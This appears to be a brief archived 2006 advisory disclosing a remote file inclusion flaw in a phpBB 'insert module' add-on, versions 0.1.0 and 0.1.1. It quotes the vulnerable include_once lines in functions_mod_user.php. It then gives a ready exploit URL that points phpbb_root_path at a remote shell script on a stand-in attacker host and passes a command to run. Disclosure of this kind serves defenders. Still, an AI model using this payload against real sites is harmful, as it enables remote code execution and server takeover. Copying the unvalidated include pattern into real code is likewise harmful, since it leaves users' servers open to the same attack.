Home / os / win2k

Phpbb-insert.txt

Posted on 16 October 2006

$ BiyoSecurity.Org & SecurityWall.Org $ Script Name : Phpbb insert module $ versions : 0.1.0 and 0.1.1 $ Risk : High $ Regard : KorsaN $ Thanks : Liz0zim , RMx , TR_IP , DreamLord , Kubra $ Vulnerable File : functions_mod_user.php $ Vulnerable code : <-- code start --> include_once($phpbb_root_path . 'includes/functions_validate.' . $phpEx); include_once($phpbb_root_path . 'includes/functions_post.' . $phpEx); include_once($phpbb_root_path . 'includes/bbcode.' . $phpEx); $ Exploit : www.victim.com/[path]/functions_mod_user.php?phpbb_root_path=http://hacker.com/shell.txt?&cmd=ls

 

TOP